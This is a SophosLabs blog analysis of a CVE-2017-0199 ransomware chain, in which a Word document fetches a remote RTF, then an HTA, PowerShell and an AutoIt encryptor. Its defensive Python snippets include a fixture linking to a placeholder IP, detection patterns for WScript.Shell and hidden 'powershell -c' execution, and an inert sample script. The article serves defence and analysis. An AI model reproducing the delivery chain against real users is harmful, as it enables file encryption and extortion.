SophosLabs analysis: why the surge in Word docs hiding ransomware?

Thanks to Graham Chantry of SophosLabs for the behind-the-scenes work on this article.

Most media attention tends to focus on the new, unique attack techniques. But for security practitioners dealing with clear and present day-to-day threats, many problems continue to involve the old-fashioned stuff, like malware hiding in Microsoft Office documents.

SophosLabs researchers see that reality in the deluge of malicious docs the bad guys continue to throw at users. The last few weeks have proven especially busy on that front, with the migration of VBA malware to PDF, a mouse-over PowerPoint infection and the adoption of CVE-2017-0199 into exploit builder kits.

In the last case, SophosLabs has seen a drastic increase in malware exploiting the CVE-2017-0199 vulnerability. According to principal researcher Gábor Szappanos, it now accounts for three of every four document exploit samples the lab has seen.


Generally, CVE-2017-0199 campaigns are distributed in spam emails where the attachment is the exploited RTF file. More recent ransomware campaigns, however, have used an old trick in Word documents to help conceal the presence of the exploit.

Old trick, fresh fruit

The trick is to host the exploited RTF on a server and embed a link to it in a standard Word attachment. When Word opens this document, it will automatically download the exploited RTF and trigger the infection process.

This is achieved using an OLEObject, the same mechanism used to include other content, such as Excel spreadsheets or Visio drawings, within a document. Rather than housing the spreadsheet or drawing in the document file itself, the object is linked to an internet address.

The spam campaigns that distribute these samples usually build their social engineering around some form of debt collection.

The screenshot above is a typical example. Note the attachment “INV #00000000.docx”. A .docx extension indicates the file is saved in the Office 2007 format. Documents in this format are ZIP files containing a variety of other file types that help define the document’s content.

The spine of any Office 2007 file is document.xml, and a quick look at its contents in a text editor shows that this file does indeed declare an embedded OLEObject. The actual contents of OLEObjects are defined in another XML file within the ZIP: document.xml.rels. An object’s declaration and definition are linked via a unique ID.

In this case, our OLEObject is identified as rId8 (highlighted in red). As you can see, our object (called yourdoc.doc) is stored on a remote server (pointed to by an IP address).
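The lookup described above can be reproduced without opening the document in Word. The following is a minimal sketch, assuming the link is recorded as a relationship whose Type ends in "/oleObject" and whose TargetMode is "External". The helper names and the 192.0.2.10 address are placeholders for illustration, not values taken from the real sample.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespace used by relationship parts (.rels files) inside the ZIP.
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_ole_links(docx_bytes):
    """Return (relationship id, target) pairs for externally linked OLE objects."""
    links = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        for name in archive.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(archive.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                is_ole = rel.get("Type", "").endswith("/oleObject")
                is_external = rel.get("TargetMode") == "External"
                if is_ole and is_external:
                    links.append((rel.get("Id"), rel.get("Target")))
    return links


def build_sample_docx():
    """Build a tiny in-memory ZIP that mimics the relationship described above.

    The IP address is a documentation placeholder (hypothetical).
    """
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId8" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
        'Target="http://192.0.2.10/yourdoc.doc" TargetMode="External"/>'
        '</Relationships>'
    )
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("word/_rels/document.xml.rels", rels)
    return buffer.getvalue()


if __name__ == "__main__":
    for rel_id, target in external_ole_links(build_sample_docx()):
        print(rel_id, target)
```

Any pair this returns for an unsolicited attachment deserves a closer look, since legitimate invoices rarely need to pull objects from a bare IP address.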

When the victim opens “INV #00000000.docx”, Word will automatically download the file from the given IP address without any form of confirmation. In fact, the only sign of anything untoward is a very short-lived “Downloading” message which is displayed in the Word splash screen:

Wait a minute… What did it just download?

Once “yourdoc.doc” has been downloaded, Word displays the fake invoice.

There’s no obvious sign of anything malicious, so one must look at the network traffic to see what was downloaded. As the screenshot below shows, yourdoc.doc was not a Word document, as the file extension suggested, but actually an RTF file. This isn’t a problem, however, as Word fully understands the file format so it’s simply a case of rendering its contents.
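The mismatch between extension and content is easy to check programmatically. This is a small sketch, assuming the download begins with the usual "{\rtf" header; the function names are hypothetical and real samples may obfuscate the header.

```python
# RTF documents normally begin with this header (assumption: no obfuscation).
RTF_MAGIC = b"{\\rtf"


def is_rtf(data: bytes) -> bool:
    """True when the content starts with the RTF header."""
    return data.startswith(RTF_MAGIC)


def disguised_rtf(filename: str, data: bytes) -> bool:
    """True when the content is RTF but the filename does not end in .rtf."""
    return is_rtf(data) and not filename.lower().endswith(".rtf")


if __name__ == "__main__":
    sample = b"{\\rtf1\\ansi placeholder}"
    print(disguised_rtf("yourdoc.doc", sample))
```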

The RTF file contains only an embedded object (signified by the {\object keyword). The section highlighted in red is a sequence of ASCII characters that represent the hexadecimal values of each byte in the embedded file. The bytes d0 cf 11 e0 a1 b1 1a e1 indicate the embedded file is in the OLE format.
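To illustrate how the hexadecimal text maps back to bytes, here is a rough sketch that decodes the hex following an \objdata control word and looks for the OLE signature. It assumes plain, unobfuscated hex; the sample string and function names are made up for the example.

```python
import re
from typing import List

# The eight signature bytes mentioned above.
OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")

# Hex digits (possibly split by whitespace) that follow \objdata.
OBJDATA = re.compile(r"\\objdata\s*([0-9a-fA-F\s]+)")


def decode_hex_run(text: str) -> bytes:
    """Turn ASCII hex digits (whitespace ignored) back into raw bytes."""
    digits = re.sub(r"\s+", "", text)
    if len(digits) % 2:
        digits = digits[:-1]  # drop a dangling half-byte
    return bytes.fromhex(digits)


def embedded_ole_payloads(rtf_text: str) -> List[bytes]:
    """Return decoded \\objdata payloads, each trimmed to start at the OLE signature."""
    payloads = []
    for match in OBJDATA.finditer(rtf_text):
        blob = decode_hex_run(match.group(1))
        offset = blob.find(OLE_MAGIC)
        if offset != -1:
            payloads.append(blob[offset:])
    return payloads


if __name__ == "__main__":
    # Hypothetical, inert sample: a short prefix, the signature, two padding bytes.
    sample = r"{\rtf1{\object\objautlink{\*\objdata 0105000002000000d0cf11e0a1b11ae10000}}}"
    for payload in embedded_ole_payloads(sample):
        print(payload.hex())
```

The search looks for the signature anywhere in the decoded data rather than only at the start, because the hex may carry other header bytes before the OLE file begins.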

When we open the embedded file in an OLE parser (seen at the bottom of the screenshot) we can see that it too has content stored remotely. In fact it’s the same IP address we downloaded this RTF from.

The file being downloaded this time, however, isn’t a document. The HTA file extension indicates it’s attempting to download an HTML application. The HTML Application file format was originally designed to allow scripting languages such as VBScript and JScript to be paired with HTML-designed user interfaces. Unfortunately, the format has also served as a reliable vehicle for delivering malicious payloads, such as the all-too-common JavaScript downloader campaigns and, of course, CVE-2017-0199.

When we jump back to Word, we can see the downloaded RTF file has now been rendered and the request to download the HTA has been intercepted.

Unlike with that first RTF download, Word suspends this HTA download and prompts the user for consent before proceeding.

While it’s undeniably a good thing that Office has asked for confirmation before loading additional content, it doesn’t really give us the full picture. It doesn’t, for example, tell us what type of file is being loaded, or where the file in question is being downloaded from – and, most crucially, it doesn’t say that allowing this file to be loaded could be very dangerous.

This is in great contrast to the warnings Office issues when the user is attempting to enable macros or when they’re attempting to open a file embedded within the document itself (as seen below).

If you’re a user who panics at the thought of final notices for unpaid bills, you might not think twice about clicking “Yes” – and this prompt simply doesn’t state how disastrous the consequences might be.

Downloading the payload

If the victim does press “Yes”, the HTA is downloaded and, thanks to CVE-2017-0199, runs without any visible sign to the user.

So what exactly does that downloaded HTA do? Looking at the network traffic, we find it consists of a very simple VBScript:

The two lines of interest are lines 3 and 4: the former creates a shell object and the latter uses it to launch a PowerShell command. Note the -c command line option, which directs PowerShell to execute the commands that follow it.
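The two behaviours described above make a simple triage heuristic. The sketch below flags script text that both creates a shell object and launches PowerShell with a -c style option. It assumes the shell object is created via CreateObject("WScript.Shell"), which the original sample may or may not do, and the sample text is an inert stand-in rather than the real script.

```python
import re

# Assumption: the shell object is created through WScript.Shell.
SHELL_OBJECT = re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.IGNORECASE)

# Matches -c and longer spellings that start with -c, such as -Command.
POWERSHELL_COMMAND = re.compile(r"powershell(?:\.exe)?[^\r\n]*\s-c", re.IGNORECASE)

# Hypothetical, harmless stand-in for the kind of script described above.
SAMPLE_HTA = '''<script language="VBScript">
Window.ReSizeTo 0, 0
Set sh = CreateObject("WScript.Shell")
sh.Run "powershell.exe -WindowStyle Hidden -c Write-Output 'placeholder'", 0
self.close
</script>'''


def suspicious_hta(text: str) -> bool:
    """True when the text creates a shell object and runs PowerShell with -c."""
    return bool(SHELL_OBJECT.search(text)) and bool(POWERSHELL_COMMAND.search(text))


if __name__ == "__main__":
    print(suspicious_hta(SAMPLE_HTA))
```

A heuristic like this is only a first filter: legitimate administration scripts can match it too, and obfuscated malware can evade it.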

The screenshot below shows a more readable version of what this PowerShell command is actually doing.

Lines 2 and 3 create URI addresses to two separate files: one a Windows Executable (au0.exe) and the other an AutoIt script (sc0.au3).

Lines 4 and 5 determine the locations on the victim’s machine where those files will be saved.

Lines 6 and 7 download the files to their given locations.

Line 8 runs the downloaded executable with the AutoIt script as an argument.

What is AutoIt?

AutoIt is a scripting language designed to automate routine tasks. What separates AutoIt from the more commonly known scripting languages, such as Perl and Python, is the ability to simulate keystrokes and mouse movement. This can be incredibly useful when, say, testing a graphical user interface.

The Windows executable that is downloaded is a legitimate version of the AutoIt interpreter. The malware downloads it in case the victim does not have AutoIt installed, because the interpreter is required for the script payload to run.

When the AutoIt script is run, it proceeds to loop through the files on the victim’s machine, finding ones of interest and encrypting them. Files encrypted include the usual targets such as documents, images and videos, but also saves from games such as Minecraft, Assassin’s Creed and DayZ, as well as Passbook files and Python scripts:

Unlike more common ransomware such as Locky, Zepto and Jaff, this family doesn’t add an extension to the encrypted files: it instead adds its calling card to the start of the filename:

And, of course, the obligatory ransom note informs the user of the steps they must take in order to retrieve their files:


Using remote content in Word documents is certainly nothing new – it’s been around for a very long time. Some of the old-school self-replicating viruses used this trick by declaring a macro template that was stored on a remote server. What makes this trend more interesting is that it’s the first time we’ve seen it used consistently with more modern threats.

The advantages to the bad guys are obvious. By keeping the actual exploited document on their own server, they control the initial stages of the attack. If at any point they decide to kill the attack, they can take the server down and the spammed document will no longer work.

Likewise, AV vendors will not be able to see the actual malicious content when they first scan the document attachment, so there is no easy way of knowing whether the content to be downloaded is a genuine document or a malicious one. Of course, AV will get its chance to scan the file when it’s downloaded, so it’s more a case of delaying than denying.

Breaking the attack up into different stages is also a nice way of concealing the overall picture of what the malware is trying to achieve. This infection chain started with a Word document, which downloaded an exploited RTF, which downloaded an HTA, which executed PowerShell, which then downloaded and executed an AutoIt payload:

The advantage of modern-day antivirus, however, is that it isn’t just one bite of the cherry any more: there are many different layers of detection. So if the original attachment isn’t detected, there is a very good chance that one of the later links in the chain, or even the running process itself, will be.

Defensive measures

Microsoft patched the vulnerability in April 2017, and those who haven’t applied the patch must do so. But there are other things one can do for a more robust defense:

  • If you receive a Word document by email and don’t know the person who sent it, DON’T OPEN IT.
  • Use an antivirus with an on-access scanner (also known as real-time protection). This can help you block malware of this type in a multi-layered defense, for example, by stopping the initial booby-trapped Word file.
  • Consider stricter email gateway settings. Some staff are more exposed to malware-sending crooks than others (such as the order processing department), and may benefit from more stringent precautions, rather than being inconvenienced by them.
  • Never turn off security features because an email or document says so. Documents such as invoices, courier advisories and job applications should be legible without macros enabled.